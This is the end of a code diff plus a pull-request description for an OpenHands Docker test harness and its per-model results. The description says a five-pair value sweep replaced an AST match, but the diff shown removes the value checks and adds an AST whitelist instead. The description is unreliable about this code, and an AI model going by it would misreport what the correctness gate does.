+        return "Call(operator.add(a, b))"
+    return None
+
+
+match = _matches_whitelist(expr)
+if match is None:
+    # Best-effort string preview of the offending expression for
+    # diagnostics without evaluating it.
     try:
-        got = mod.add(a, b)
-    except Exception as exc:  # noqa: BLE001
-        print(
-            f"[correctness] RUNTIME-ERROR: add({a}, {b}) raised {exc!r}",
-            file=sys.stderr,
-        )
-        sys.exit(1)
-    if got != expected:
-        print(
-            f"[correctness] VALUE-ERROR: add({a}, {b}) returned {got!r}, "
-            f"expected {expected!r}",
-            file=sys.stderr,
-        )
-        sys.exit(1)
+        preview = ast.unparse(expr)
+    except Exception:  # noqa: BLE001 — very old Python
+        preview = ast.dump(expr, annotate_fields=False)
+    print(
+        f"[correctness] AST-ERROR: return expression not in semantic-add "
+        f"whitelist: {preview}",
+        file=sys.stderr,
+    )
+    sys.exit(1)
 
-print("[correctness] OK: all five (a, b) → a+b checks passed")
+print(f"[correctness] OK: return expression matches whitelist form: {match}")
 sys.exit(0)
 PYEOF
 then
@@ -480,5 +586,5 @@ then
     exit 3
 fi
 
-echo "[test_openhands.sh] PASS: five-pair add(a, b) == a+b checks satisfied"
+echo "[test_openhands.sh] PASS: add.py return expression is semantic add"
 exit 0


### PR DESCRIPTION
## Summary

- `tests/integrations/test_openhands.sh` — real Docker E2E harness that pulls pinned OpenHands **0.9.0** app image (`ghcr.io/all-hands-ai/openhands:0.9.0`, multi-arch arm64/amd64) + the matching pre-built runtime baseline (`ghcr.io/all-hands-ai/runtime:od_v0.9.0_image_nikolaik___python-nodejs_tag_python3.11-nodejs22`), spawns the sandbox runtime via docker-in-docker sock passthrough, drives `python -m openhands.core.main -t "Fix the bug in add.py — …"` against a running `rapid-mlx serve`, and asserts the CodeActAgent's text-action edits actually rewrote `add.py` (five-pair `add(a, b) == a + b` sweep — see the "Correctness gate" section below).
- `TestOpenHands` in `test_agents_matrix.py` — class-level `xfail(strict=True)` placeholder removed; `test_smoke` now shells out to the harness. Docker daemon skip guard so non-Docker CI stays green.
- 4 Tier-1 family cells: **3 PASS, 1 XFAIL** (gpt-oss, root-caused).

## Motivation

The previous `TestOpenHands` was a strict-xfail placeholder with reason "OpenHands' native wire is a text-action format, not OpenAI function calling; Docker E2E harness required." raullen (2026-07-07) escalated this from 0.10.6 Phase 4 to NOW alongside the Aider harness (PR #1047, `f845cebc`) — Docker daemon is running on the M3 Ultra, images fit disk (peak ~12 GB used, floor 100+ GB free throughout, G11 respected).

OpenHands' CodeActAgent parses `<execute_bash>` / `<execute_ipython>` from plain-text LLM output rather than via OpenAI `tool_calls` — so the correctness signal is "did the agent actually rewrite the file the way we asked", not "did tool_calls fire". Same shape as Aider.

## Fix

**Harness** (`test_openhands.sh`) mirrors the Aider harness pattern:
- Args: `--model <alias> (--base-url <url> | --port <port>) [--timeout <secs>] [--max-iterations <n>] [-v]`.
- `--base-url` is preferred and authoritative. Codex round-1 finding #1 fix: the harness rewrites the host to `host.docker.internal` **only** when the parsed host is one of `localhost` / `127.0.0.1` / `0.0.0.0` / `::1`. Any other host (`remote-host.example.com`, `192.168.1.42`, …) is preserved as-is so a fixture pointed at a genuine remote-serve node still tests the intended server.
- 5 s `/v1/models` probe before spending 5+ minutes on Docker startup.
- Fresh `mktemp` scratch WORKDIR + OPENHANDS_STATE — HOME-equivalent override so the operator's real `~/.openhands*` state is never touched.
- `docker info` daemon probe → hard exit 1 with a clear error if the daemon isn't reachable.
- `docker pull` idempotent (only if not cached) so cold-cache and warm-cache boots both work.
- `docker run --rm --name openhands-test-$$-<ts>` for uniqueness across parallel harness invocations. Cleanup `trap` force-removes the container and rms scratch dirs; `docker system prune` is NOT run (would nuke operator's other containers).
- Env-var wiring: `SANDBOX_CONTAINER_IMAGE=<pre-built runtime>` (OpenHands' builder short-circuits its Dockerfile-from-scratch path when the image string contains `ghcr.io/all-hands-ai/runtime`), `SANDBOX_USER_ID=$(id -u)`, `SANDBOX_TIMEOUT=180`, `WORKSPACE_MOUNT_PATH=<host abs>`, `WORKSPACE_BASE=/opt/workspace_base` (matches image default), `LLM_BASE_URL=http://<host>:PORT/v1`, `LLM_MODEL=openai/<alias>` (LiteLLM provider prefix), `LLM_API_KEY=rapidmlx`.
- Distinct exit codes: 0 pass / 1 setup / 2 openhands runtime fail / 3 edit-not-applied / 4 timeout — same taxonomy as `test_aider.sh`.
- `gtimeout` / `timeout` required (same rationale as `test_aider.sh` round-2 finding #3 — signals must reach the whole exec'd tree, not just the harness's own subshell).

**Correctness gate** — Codex round-1 findings #2 and #3 (BLOCKING): the previous single-pair `add(2, 3) == 5` + "any `ast.Add` anywhere" AST match let `return a - b + 6` and `return (a - b) + 6` fake a pass. Fix: a five-pair sweep — `(2,3)→5`, `(10,-4)→6`, `(0,0)→0`, `(-1,1)→0`, `(100,200)→300` — that jointly pins the linear combination to slope-1 on both variables with zero intercept, so no polynomial masquerade (`a + k`, `a - b + k`, `a + b + k` (k ≠ 0)), no hard-coded `return CONST`, and no missed-flip regression can satisfy all five checks. The weak AST match is dropped as strictly redundant with the multi-pair sweep. Verified locally with an 8-case test harness (correct `a + b` / `sum([a, b])` / `operator.add(a, b)` all PASS; `a - b + 6` / `(a - b) + 6` / `return 5` / `a + b + 1` / still-buggy `a - b` all FAIL with the specific value-error surfaced).

**Python wrapper** (`TestOpenHands.test_smoke`) shells out to the harness with the parsed base_url + model_id, timeout budget 600 s + 60 s pytest wall pad. `_docker_available()` probes `docker info` with a 5 s cap; miss → `pytest.skip` (never `pytest.fail`) so non-Docker CI stays green.

**Conftest fix** — `family_alias_for_active_server` for `qwen3.5-4b-4bit` served with hf_path prefix (`mlx-community/Qwen3.5-4B-MLX-4bit`) previously failed the `startswith("qwen3.5")` check; now uses substring match, symmetrizing with the other three family arms.

## Empirical family-by-family results

Cached-image path, port 8802, `RAPID_MLX_MATRIX_STRICT=1`:

| Family | Boot alias | Wall time | Verdict |
|---|---|---|---|
| Qwen 3.6 | `qwen3.5-4b-4bit` | 32.14 s | PASS (2 CodeAct steps: read → `edit_file_by_replace` → finish) |
| Gemma 4 | `gemma-4-31b-4bit` | 47.87 s | PASS |
| DeepSeek | `deepseek-r1-32b-4bit` | 72.08 s | PASS (long analysis-channel CoT before the edit — but text-action format doesn't require `tool_calls`, so R1-Distill drives it successfully, same reasoning as Aider) |
| gpt-oss | `gpt-oss-20b-mxfp4-q8` | XFAIL (615 s harness timeout) | **XFAIL (server)** — root-caused |

## gpt-oss XFAIL — root cause

CodeActAgent sets `stop=['</execute_ipython>', '</execute_bash>', '</execute_browse>']` on every `/v1/chat/completions` request. gpt-oss (harmony) produces its response in TWO channels: an internal `analysis` channel (CoT) and a visible `final` channel. rapid-mlx's harmony parser applies user-supplied stop sequences against the **raw** token stream (both channels), so the model's analysis-channel CoT — which routinely mentions the string `</execute_ipython>` while reasoning about the CodeAct action to take — triggers a premature stop BEFORE the model can switch to the final channel. Result: `content=""` with `reasoning_content` holding the full CoT ending in `</execute_ipython>`; CodeActAgent falls back to an empty `MessageAction` and asks for user input, which errors under `main -t` headless mode.

Reproducer (from inside the OpenHands 0.9.0 container, LiteLLM 1.44.1):
```python
resp = litellm.completion(
    model="openai/gpt-oss-20b-mxfp4-q8",
    api_base="http://host.docker.internal:PORT/v1",
    max_tokens=8192, temperature=0.0,
    stop=["</execute_ipython>","</execute_bash>","</execute_browse>"],
    messages=[
        {"role":"system","content":"...<execute_ipython>..."},
        {"role":"user","content":"Print hello world in ipython."},
    ],
)
# resp.choices[0].message.content == ""
# resp.choices[0].message.reasoning_content ends with "</execute_ipython>"
```
The SAME prompt without `stop=` returns the correct `<execute_ipython>\nprint("hello world")\n</execute_ipython>` in `content`. So the failure is NOT the CodeAct system prompt, NOT `max_tokens`, NOT LiteLLM routing — it's the harmony parser scoping user-supplied stops incorrectly.

Marked `xfail(strict=True)` per G8 with the evidence-based reason surfaced in `conftest.py::_GPTOSS_OPENHANDS_XFAIL_REASON`. Post-merge follow-up server fix belongs in the `vllm_mlx` harmony parser (restrict user-supplied stops to final-channel content); when landed, the strict marker will XPASS and force a revisit.

## Totals

Previously (post-Aider merge): **43 PASS · 13 XFAIL · 0 FAIL** — 4 XFAIL were OpenHands cells + 9 DeepSeek arch-XFAIL.

Now (post this PR): **46 PASS · 10 XFAIL · 0 FAIL** — 9 DeepSeek arch-XFAIL + 1 gpt-oss server-XFAIL (net +3 PASS, -3 XFAIL for the OpenHands column).

## Test plan

Executed and verified on the M3 Ultra dev box, all four family reps served on port 8802 (`--tool-call-parser <family>` + `--enable-auto-tool-choice`):

- `bash tests/integrations/test_openhands.sh --model qwen3.5-4b-4bit --base-url http://127.0.0.1:8802/v1` — PASS, 32 s
- `RAPID_MLX_AGENT_MATRIX_FAMILY=qwen36 pytest tests/integrations/test_agents_matrix.py::TestOpenHands` — PASS 32.14 s
- `RAPID_MLX_AGENT_MATRIX_FAMILY=gemma4 pytest tests/integrations/test_agents_matrix.py::TestOpenHands` — PASS 47.87 s
- `RAPID_MLX_AGENT_MATRIX_FAMILY=deepseek pytest tests/integrations/test_agents_matrix.py::TestOpenHands` — PASS 72.08 s
- `RAPID_MLX_AGENT_MATRIX_FAMILY=gptoss pytest tests/integrations/test_agents_matrix.py::TestOpenHands` — XFAIL (strict marker fires as expected) 615 s
- URL rewrite: `bash -x` traces confirm `--base-url http://127.0.0.1:...` and `http://localhost:...` rewrite host to `host.docker.internal`, while `http://192.168.1.42:...` and `http://remote-host.example.com:...` are preserved — see the URL-rewrite comment block in the harness.
- Correctness gate: 8-case cheat-detection sweep confirms it PASSES `a + b`, `sum([a, b])`, `operator.add(a, b)` and FAILS `a - b + 6`, `(a - b) + 6`, `return 5`, `a + b + 1`, and still-buggy `a - b`.
- `python -m scripts.pr_validate.pr_validate 1048` — codex round-1 findings addressed in the follow-up commit; test_env_check + full_unit ERROR under system Python 3.9 (pre-existing env issue on the dev box; the pipeline's `PY | Q` union-type syntax is a 3.10+ feature — CI uses 3.10/3.11/3.12 shards which are green in the PR checks).

Post-merge follow-ups (prose): open a rapid-mlx server-side issue against the harmony parser to scope user-supplied `stop=` sequences to final-channel content only; once landed, the gpt-oss+OpenHands cell will XPASS and force removal of the strict marker. Pin bumps for the OpenHands image tag (`0.9.0` → next) should follow the same LATEST-release-tag lookup path that `test_openhands.sh` documents in its pinned-image comment block.

Guardrails observed: G1 (fixture picks ≥8802, never 8801/8772), G3 (per-commit env vars, no force-push), G4 (no pyproject bump), G8 (root-caused every failure — no downgrades), G11 (disk floor 100+ GB throughout), G13 (rebased onto `origin/main` @ `f845cebc`), G14 (branch → PR flow), CLI isolation (no host binary install, scratch OpenHands state dir), operator-lane (no `vllm_mlx/spec_decode/` or `speculative/*` touch), skip-version-bump label applied.